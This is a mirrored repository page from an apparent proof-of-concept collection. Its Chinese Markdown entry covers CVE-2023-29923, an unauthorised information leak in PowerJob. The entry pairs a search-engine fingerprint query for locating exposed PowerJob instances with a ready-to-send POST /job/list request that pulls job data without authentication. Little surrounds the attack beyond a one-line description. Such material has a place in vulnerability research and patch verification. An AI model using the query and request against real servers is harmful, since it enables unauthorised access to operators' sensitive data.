admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-05 10:50:23 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/PowerJob list 信息泄漏漏洞 CVE-2023-29923.md

34 lines
533 B
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# PowerJob list 信息泄漏漏洞 CVE-2023-29923
## 漏洞描述
PowerJob list接口存在信息泄漏漏洞攻击者无需通过授权就可以访问授权的接口获取敏感数据。
## 漏洞影响
```
PowerJob
```
## 网络测绘
```
app="PowerJob"
```
## 漏洞复现
登陆页面
![image-20230424163841725](images/image-20230424163841725.png)
验证POC
```
POST /job/list
Content-Type: application/json
{"appId":1,"index":0,"pageSize":10}
```
![image-20230424163855220](images/image-20230424163855220.png)
Reference in New Issue Copy Permalink